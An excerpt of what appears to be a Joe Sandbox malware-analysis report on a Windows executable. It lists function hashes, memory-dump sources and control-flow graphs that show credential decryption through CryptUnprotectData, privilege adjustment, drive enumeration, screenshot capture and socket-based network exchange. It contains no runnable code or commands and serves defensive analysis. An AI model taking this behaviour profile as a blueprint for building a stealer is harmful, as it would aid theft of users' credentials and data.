                                                                                                                • Instruction Fuzzy Hash: 42C1E863E18B8186F710CF78D4403AD7771E7997A8F105325EAAC56ADAEF38D285C780
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3038321057-0
                                                                                                                • Opcode ID: d2de06470b4ed8e39d37734a47601b9eff7cf65b32299141bc4bcc42cf026e17
                                                                                                                • Instruction ID: be566dfc68513ac6f9546e3631e5756a39c902f4e4369e56e2be8e1474699f3f
                                                                                                                • Opcode Fuzzy Hash: d2de06470b4ed8e39d37734a47601b9eff7cf65b32299141bc4bcc42cf026e17
                                                                                                                • Instruction Fuzzy Hash: 78219132618B8182E720CF21F45436BB3A0FB88BD4F954135EA9E83B98EF7CD5448B40
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bdfc264763085100c9ceea0cb093e74c21f953b0fe1630ff8726f33abd6df56a
                                                                                                                • Instruction ID: 4c92e2b8623e3848341f7d18453f8425a9ffcce44023c6f04417536847ab8c81
                                                                                                                • Opcode Fuzzy Hash: bdfc264763085100c9ceea0cb093e74c21f953b0fe1630ff8726f33abd6df56a
                                                                                                                • Instruction Fuzzy Hash: EBF14072A19F858AEB208B69E44136D77B1F788798F104325EEEC57B99EF3CD1908740
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e17b33f593c81b7dab2fb749b276856ab219a4204adf8816c7f338b85f00c752
                                                                                                                • Instruction ID: 2d1fc46aad242e8ee5cd1c51287396e31cd693c29ddbc875715b62c8be076641
                                                                                                                • Opcode Fuzzy Hash: e17b33f593c81b7dab2fb749b276856ab219a4204adf8816c7f338b85f00c752
                                                                                                                • Instruction Fuzzy Hash: 03F14172A19F848AEB208B69E44135D77B4F7887A8F105325EEEC57B99EF3CD1908740
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 751eaf67bd44956e070fd6352f983768d72bd2241e55e699cc680544b85578a0
                                                                                                                • Instruction ID: a7bdbb5c2b1ecf820a86a6f1b5fb79bb9c266aef4bbf2930148ab8b660e7239d
                                                                                                                • Opcode Fuzzy Hash: 751eaf67bd44956e070fd6352f983768d72bd2241e55e699cc680544b85578a0
                                                                                                                • Instruction Fuzzy Hash: 1DF15272A19F888AE7208B69E44135D77B4F7887A8F105325EEEC57B99EF7CD1808740
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InformationTimeZone
                                                                                                                • String ID: [UTC
                                                                                                                • API String ID: 565725191-1715286942
                                                                                                                • Opcode ID: 227df7f9fc515862566a01e59866b53c9bfa63972a69ca4c12e822ae5807cade
                                                                                                                • Instruction ID: f8326df1964449daab08267083cc4f516f2cc7cead23355735806309912f90e8
                                                                                                                • Opcode Fuzzy Hash: 227df7f9fc515862566a01e59866b53c9bfa63972a69ca4c12e822ae5807cade
                                                                                                                • Instruction Fuzzy Hash: C5B14C32A18FC889D7318F29E84129AB7A1F79D788F105325EADC57B59EF78D250CB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DriveLogicalStrings
                                                                                                                • String ID:
                                                                                                                • API String ID: 2022863570-0
                                                                                                                • Opcode ID: 382e336121ae80466f962879a2229f0e9dc64838799d8113c369efc1594dfaf3
                                                                                                                • Instruction ID: dfbc5f6c8572dc6b5ad000aa814047402f3445aa2705e7723a6e0fab811c6827
                                                                                                                • Opcode Fuzzy Hash: 382e336121ae80466f962879a2229f0e9dc64838799d8113c369efc1594dfaf3
                                                                                                                • Instruction Fuzzy Hash: 20516232A18B8182E7108F24E4803AD7775FB85798F505325EAAC53AE9EF7CE591DB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CryptDataFreeLocalUnprotect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1561624719-0
                                                                                                                • Opcode ID: 3f0d2640eba4d0f7871c2ec703edcb503dbe0d7ea7d03094cd3af9045bbe76bf
                                                                                                                • Instruction ID: c5ca34f0600800bc183c00330f570de723f4bd5495b54e59d78226e3d1467034
                                                                                                                • Opcode Fuzzy Hash: 3f0d2640eba4d0f7871c2ec703edcb503dbe0d7ea7d03094cd3af9045bbe76bf
                                                                                                                • Instruction Fuzzy Hash: CE414732A18B81CAE3208F74D4503ED37A4FB5878CF444639EA8D56E8AEF79D5A4C744
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: 8c2ee609906b87691af69831a7a769d4e2737882f8e3536b1fee27c1dc0d25fe
                                                                                                                • Instruction ID: bc6f8f6e55127b7f9bd42cc967a65a83fc2a9d0f8e75a29d4029e177155b705f
                                                                                                                • Opcode Fuzzy Hash: 8c2ee609906b87691af69831a7a769d4e2737882f8e3536b1fee27c1dc0d25fe
                                                                                                                • Instruction Fuzzy Hash: 92D15B62F08B818AF711CB74D4403EC37B6EB5579CF415325EA6C66ADAEF38A194C384

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1922 7ff6f1dcebf0-7ff6f1dcec2b call 7ff6f1dce970 1925 7ff6f1dcec6c 1922->1925 1926 7ff6f1dcec2d-7ff6f1dcec3c EnterCriticalSection 1922->1926 1929 7ff6f1dcec71-7ff6f1dcec8f call 7ff6f1dfe860 1925->1929 1927 7ff6f1dcec3e-7ff6f1dcec60 GdiplusStartup 1926->1927 1928 7ff6f1dcec90-7ff6f1dcecaa LeaveCriticalSection GdipGetImageEncodersSize 1926->1928 1927->1928 1930 7ff6f1dcec62-7ff6f1dcec66 LeaveCriticalSection 1927->1930 1928->1925 1932 7ff6f1dcecac-7ff6f1dcecbf 1928->1932 1930->1925 1934 7ff6f1dcecc1-7ff6f1dcecca call 7ff6f1dce700 1932->1934 1935 7ff6f1dcecfb-7ff6f1dced09 call 7ff6f1de83d8 1932->1935 1942 7ff6f1dceccc-7ff6f1dcecd6 1934->1942 1943 7ff6f1dcecf8 1934->1943 1940 7ff6f1dced10-7ff6f1dced1a 1935->1940 1941 7ff6f1dced0b-7ff6f1dced0e 1935->1941 1944 7ff6f1dced1e 1940->1944 1941->1944 1945 7ff6f1dcece2-7ff6f1dcecf6 call 7ff6f1dff520 1942->1945 1946 7ff6f1dcecd8 1942->1946 1943->1935 1947 7ff6f1dced21-7ff6f1dced24 1944->1947 1945->1947 1946->1945 1950 7ff6f1dced30-7ff6f1dced3e GdipGetImageEncoders 1947->1950 1951 7ff6f1dced26-7ff6f1dced2b 1947->1951 1953 7ff6f1dced44-7ff6f1dced4d 1950->1953 1954 7ff6f1dcee89-7ff6f1dcee8e 1950->1954 1952 7ff6f1dcee9e-7ff6f1dceea1 1951->1952 1957 7ff6f1dceea3-7ff6f1dceea7 1952->1957 1958 7ff6f1dceec4-7ff6f1dceec6 1952->1958 1955 7ff6f1dced7f 1953->1955 1956 7ff6f1dced4f-7ff6f1dced5d 1953->1956 1954->1952 1959 7ff6f1dced86-7ff6f1dced96 1955->1959 1960 7ff6f1dced60-7ff6f1dced6b 1956->1960 1961 7ff6f1dceeb0-7ff6f1dceec2 call 7ff6f1de7620 1957->1961 1958->1929 1963 7ff6f1dcedaf-7ff6f1dcedcb 1959->1963 1964 7ff6f1dced98-7ff6f1dceda9 1959->1964 1965 7ff6f1dced6d-7ff6f1dced72 1960->1965 1966 7ff6f1dced78-7ff6f1dced7d 1960->1966 1961->1958 1968 7ff6f1dcedcd-7ff6f1dcee26 GdipCreateBitmapFromScan0 GdipSaveImageToStream 1963->1968 1969 7ff6f1dcee38-7ff6f1dcee77 GdipCreateBitmapFromHBITMAP GdipSaveImageToStream 1963->1969 1964->1954 1964->1963 1965->1966 1970 7ff6f1dcee2d-7ff6f1dcee31 1965->1970 1966->1955 1966->1960 1971 7ff6f1dcee36 1968->1971 1972 7ff6f1dcee28-7ff6f1dcee2b 1968->1972 1973 7ff6f1dcee90-7ff6f1dcee9d GdipDisposeImage 1969->1973 1974 7ff6f1dcee79 1969->1974 1970->1959 1971->1973 1975 7ff6f1dcee7c-7ff6f1dcee83 GdipDisposeImage 1972->1975 1973->1952 1974->1975 1975->1954
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Gdip$Image$CriticalSection$DisposeEncodersLeave$BitmapCreateEnterErrorFromGdiplusInitializeLastSaveScan0SizeStartupStream
                                                                                                                • String ID: &
                                                                                                                • API String ID: 1703174404-3042966939
                                                                                                                • Opcode ID: dd964381881d80bb3d13f7f21f812b9ad7ab8c9b9795b3d442a88d8ae0dd4017
                                                                                                                • Instruction ID: a30893c1c06d8fc89840c879f76505eaa642e628ead12605aeb54bece3585d37
                                                                                                                • Opcode Fuzzy Hash: dd964381881d80bb3d13f7f21f812b9ad7ab8c9b9795b3d442a88d8ae0dd4017
                                                                                                                • Instruction Fuzzy Hash: 9C918172A04B828AE720CF25E8005E83BB4FB55BD8B544A35EA2D97BD4EF3CE545D740

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2305 7ff6f1dcfca0-7ff6f1dcfdc6 call 7ff6f1dd58d0 call 7ff6f1dad590 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d986b0 call 7ff6f1d91900 call 7ff6f1d93ff0 WSAStartup 2320 7ff6f1dcfdcc-7ff6f1dcfdec socket 2305->2320 2321 7ff6f1dcfe87 2305->2321 2322 7ff6f1dcfdf2-7ff6f1dcfe1e htons 2320->2322 2323 7ff6f1dcfe81 WSACleanup 2320->2323 2324 7ff6f1dcfe89-7ff6f1dcfe91 2321->2324 2327 7ff6f1dcfe24-7ff6f1dcfe34 call 7ff6f1ddd830 2322->2327 2328 7ff6f1dcff29-7ff6f1dcff5a call 7ff6f1dceed0 call 7ff6f1d926d0 2322->2328 2323->2321 2325 7ff6f1dcfe93-7ff6f1dcfea4 2324->2325 2326 7ff6f1dcfec4-7ff6f1dcff05 call 7ff6f1dfe860 2324->2326 2329 7ff6f1dcfebf call 7ff6f1dfe880 2325->2329 2330 7ff6f1dcfea6-7ff6f1dcfeb9 2325->2330 2341 7ff6f1dcfe36 2327->2341 2342 7ff6f1dcfe39-7ff6f1dcfe65 inet_pton connect 2327->2342 2347 7ff6f1dcff92-7ff6f1dcffaf call 7ff6f1dceed0 2328->2347 2348 7ff6f1dcff5c-7ff6f1dcff72 2328->2348 2329->2326 2330->2329 2334 7ff6f1dd002b-7ff6f1dd0030 call 7ff6f1de8254 2330->2334 2349 7ff6f1dd0031-7ff6f1dd0036 call 7ff6f1de8254 2334->2349 2341->2342 2345 7ff6f1dcfe6b-7ff6f1dcfe72 2342->2345 2346 7ff6f1dcff06-7ff6f1dcff10 2342->2346 2345->2327 2351 7ff6f1dcfe74-7ff6f1dcfe7b closesocket 2345->2351 2346->2328 2350 7ff6f1dcff12-7ff6f1dcff1b 2346->2350 2359 7ff6f1dcffb4-7ff6f1dcffd8 call 7ff6f1d926d0 2347->2359 2352 7ff6f1dcff74-7ff6f1dcff87 2348->2352 2353 7ff6f1dcff8d call 7ff6f1dfe880 2348->2353 2356 7ff6f1dcff20-7ff6f1dcff28 call 7ff6f1d94600 2350->2356 2357 7ff6f1dcff1d 2350->2357 2351->2323 2352->2349 2352->2353 2353->2347 2356->2328 2357->2356 2365 7ff6f1dd0014-7ff6f1dd0020 2359->2365 2366 7ff6f1dcffda-7ff6f1dcfff0 2359->2366 2365->2324 2367 7ff6f1dcfff2-7ff6f1dd0005 2366->2367 2368 7ff6f1dd0007-7ff6f1dd000c call 7ff6f1dfe880 2366->2368 2367->2368 2369 7ff6f1dd0025-7ff6f1dd002a call 7ff6f1de8254 2367->2369 2368->2365 2369->2334
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Info$CleanupStartupUserclosesocketconnecthtonsinet_ptonsocket
                                                                                                                • String ID: geo$system
                                                                                                                • API String ID: 2440148987-2364779556
                                                                                                                • Opcode ID: aaeb017864ce7edbbbebaae91aaee4570c05fc7f64b7e84cdb624bad49156934
                                                                                                                • Instruction ID: 034f914f607dd6251f86b9f95b099a0a4e167fa2b63f03fc4b3e1bc0458df6cc
                                                                                                                • Opcode Fuzzy Hash: aaeb017864ce7edbbbebaae91aaee4570c05fc7f64b7e84cdb624bad49156934
                                                                                                                • Instruction Fuzzy Hash: A1B18C62F18A4289EB009B64D4502FC3372AF857E8F415636DA3D976E9EF3CD549C340

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 2374 7ff6f1dd4a30-7ff6f1dd4a92 call 7ff6f1dff520 call 7ff6f1ddc190 2379 7ff6f1dd4a94 2374->2379 2380 7ff6f1dd4a97-7ff6f1dd4ae1 call 7ff6f1d95310 call 7ff6f1d94fe0 2374->2380 2379->2380 2385 7ff6f1dd4ae3-7ff6f1dd4af5 2380->2385 2386 7ff6f1dd4b15-7ff6f1dd4b34 2380->2386 2387 7ff6f1dd4b10 call 7ff6f1dfe880 2385->2387 2388 7ff6f1dd4af7-7ff6f1dd4b0a 2385->2388 2389 7ff6f1dd4b6b-7ff6f1dd4bef call 7ff6f1dd0e00 call 7ff6f1e11650 2386->2389 2390 7ff6f1dd4b36-7ff6f1dd4b4b 2386->2390 2387->2386 2388->2387 2391 7ff6f1dd51fc-7ff6f1dd5201 call 7ff6f1de8254 2388->2391 2405 7ff6f1dd4bf4-7ff6f1dd4c14 recv 2389->2405 2393 7ff6f1dd4b4d-7ff6f1dd4b60 2390->2393 2394 7ff6f1dd4b66 call 7ff6f1dfe880 2390->2394 2397 7ff6f1dd5202-7ff6f1dd5207 call 7ff6f1de8254 2391->2397 2393->2394 2393->2397 2394->2389 2406 7ff6f1dd5208-7ff6f1dd520d call 7ff6f1de8254 2397->2406 2407 7ff6f1dd4c1a-7ff6f1dd4c36 2405->2407 2408 7ff6f1dd4cd7-7ff6f1dd4d19 2405->2408 2420 7ff6f1dd520e-7ff6f1dd5213 call 7ff6f1de8254 2406->2420 2410 7ff6f1dd4c76-7ff6f1dd4c92 call 7ff6f1d99030 2407->2410 2411 7ff6f1dd4c38-7ff6f1dd4c74 call 7ff6f1e10fb0 2407->2411 2412 7ff6f1dd4d1f 2408->2412 2413 7ff6f1dd5011-7ff6f1dd5029 2408->2413 2423 7ff6f1dd4c97-7ff6f1dd4ca0 2410->2423 2411->2423 2417 7ff6f1dd4d20-7ff6f1dd4d2c call 7ff6f1de89b0 2412->2417 2418 7ff6f1dd502f-7ff6f1dd5095 call 7ff6f1d9b220 call 7ff6f1dd0e00 2413->2418 2419 7ff6f1dd5220-7ff6f1dd5225 call 7ff6f1d7b8e0 2413->2419 2435 7ff6f1dd4d32-7ff6f1dd4d35 2417->2435 2436 7ff6f1dd5005-7ff6f1dd500b 2417->2436 2442 7ff6f1dd5097-7ff6f1dd50a9 2418->2442 2443 7ff6f1dd50c9-7ff6f1dd50cf 2418->2443 2434 7ff6f1dd5226-7ff6f1dd522b call 7ff6f1de8254 2419->2434 2433 7ff6f1dd5214-7ff6f1dd5219 call 7ff6f1de8254 2420->2433 2423->2405 2428 7ff6f1dd4ca6-7ff6f1dd4cd3 2423->2428 2428->2408 2449 7ff6f1dd521a-7ff6f1dd521f call 7ff6f1de8254 2433->2449 2451 7ff6f1dd522c-7ff6f1dd5231 call 7ff6f1de8254 2434->2451 2435->2436 2440 7ff6f1dd4d3b-7ff6f1dd4dec call 7ff6f1d96700 call 7ff6f1dc0040 call 7ff6f1d937f0 call 7ff6f1dd0e90 call 7ff6f1ddc190 2435->2440 2436->2413 2436->2417 2483 7ff6f1dd4dee 2440->2483 2484 7ff6f1dd4df1-7ff6f1dd4e7d call 7ff6f1d95310 call 7ff6f1d93d70 call 7ff6f1dd0e00 2440->2484 2447 7ff6f1dd50c4 call 7ff6f1dfe880 2442->2447 2448 7ff6f1dd50ab-7ff6f1dd50be 2442->2448 2450 7ff6f1dd50d4-7ff6f1dd50fc recv 2443->2450 2447->2443 2448->2434 2448->2447 2449->2419 2455 7ff6f1dd5104-7ff6f1dd5117 WSACleanup 2450->2455 2456 7ff6f1dd50fe closesocket 2450->2456 2463 7ff6f1dd5232-7ff6f1dd5237 call 7ff6f1de8254 2451->2463 2461 7ff6f1dd514e-7ff6f1dd5176 2455->2461 2462 7ff6f1dd5119-7ff6f1dd512e 2455->2462 2456->2455 2467 7ff6f1dd51ad-7ff6f1dd51fb call 7ff6f1dfe860 2461->2467 2468 7ff6f1dd5178-7ff6f1dd518d 2461->2468 2465 7ff6f1dd5130-7ff6f1dd5143 2462->2465 2466 7ff6f1dd5149 call 7ff6f1dfe880 2462->2466 2465->2451 2465->2466 2466->2461 2469 7ff6f1dd518f-7ff6f1dd51a2 2468->2469 2470 7ff6f1dd51a8 call 7ff6f1dfe880 2468->2470 2469->2463 2469->2470 2470->2467 2483->2484 2490 7ff6f1dd4e82-7ff6f1dd4e92 2484->2490 2491 7ff6f1dd4e94-7ff6f1dd4ea6 2490->2491 2492 7ff6f1dd4ec6-7ff6f1dd4ee4 2490->2492 2493 7ff6f1dd4ec1 call 7ff6f1dfe880 2491->2493 2494 7ff6f1dd4ea8-7ff6f1dd4ebb 2491->2494 2495 7ff6f1dd4f1b-7ff6f1dd4f38 2492->2495 2496 7ff6f1dd4ee6-7ff6f1dd4efb 2492->2496 2493->2492 2494->2406 2494->2493 2500 7ff6f1dd4f6f-7ff6f1dd4fb8 call 7ff6f1d93ff0 * 2 2495->2500 2501 7ff6f1dd4f3a-7ff6f1dd4f4f 2495->2501 2498 7ff6f1dd4efd-7ff6f1dd4f10 2496->2498 2499 7ff6f1dd4f16 call 7ff6f1dfe880 2496->2499 2498->2420 2498->2499 2499->2495 2510 7ff6f1dd4fef-7ff6f1dd5000 2500->2510 2511 7ff6f1dd4fba-7ff6f1dd4fcf 2500->2511 2504 7ff6f1dd4f51-7ff6f1dd4f64 2501->2504 2505 7ff6f1dd4f6a call 7ff6f1dfe880 2501->2505 2504->2433 2504->2505 2505->2500 2510->2450 2512 7ff6f1dd4fd1-7ff6f1dd4fe4 2511->2512 2513 7ff6f1dd4fea call 7ff6f1dfe880 2511->2513 2512->2449 2512->2513 2513->2510
                                                                                                                APIs
                                                                                                                Memory Dump Source
